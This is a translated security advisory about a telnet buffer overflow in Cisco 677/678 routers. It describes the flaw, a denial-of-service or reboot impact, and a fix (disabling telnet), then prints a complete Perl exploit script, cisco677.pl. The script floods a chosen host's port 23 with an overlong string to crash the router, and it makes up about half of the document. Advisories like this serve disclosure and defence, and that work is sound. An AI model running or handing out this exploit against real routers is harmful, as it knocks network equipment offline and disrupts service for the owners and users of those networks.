Cisco 677/678 Telnet Overflow Vulnerability

Translated and compiled by: cnhackTNT
Team :C4ST
Web :Http://www.china4lert.org
Http://www.netdoc.cn.st
Email:cnhacktnt@hotmail.com


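The telnet service on Cisco 677/678 routers has an overflow vulnerability.

<Vulnerability description>:

When an overlong string is sent to port 23 of the target, the router's
telnet service overflows.

<Impact>:
The overflow causes a denial of service on the router, or even a reboot.
To date, the ISPs concerned have still not paid attention to it.

<Solution>:
Disable the router's telnet service.

<Test exploit>: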

#--------------------cisco677.pl------------------
#!/usr/bin/perl
#
# close your Cisco 677 up on the Telnet server!
# Made for fun only! port 23 is the Telnet server port on the router
# By DNV THX to DKW-stuff
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("No Telnet server here! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nPackets Sent\n");
sub usage {die("\n$0 -s <server>\n\n");}
#-------------------------------------------------

Original: http://www.deadmeat.dk
Author:DNV

Copyright by 「黑白网络工作室」 2002. All Rights Reserved.